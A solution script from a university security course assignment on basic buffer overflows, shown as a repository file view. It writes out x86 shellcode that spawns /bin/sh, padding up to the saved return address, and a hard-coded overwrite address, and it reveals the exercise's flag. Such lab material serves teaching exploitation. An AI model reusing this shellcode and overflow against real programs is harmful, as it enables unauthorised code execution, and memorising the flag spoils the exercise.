Systemsicherheit/Assignment 6 - Software Security - Teil 2/basic_overflow/solution.sh

15 lines
427 B
Bash
Raw Normal View History

#!/bin/bash
# flag{THAT_WAS_EASY_HUH}
######### Exploit #########
# Step 1: Write the provided shellcode to stdout
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
# Step 2: Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..91}
# Step 3: Overwrite the stored EIP with the address of the shellcode
printf "\x2c\xd5\xff\xff"
###########################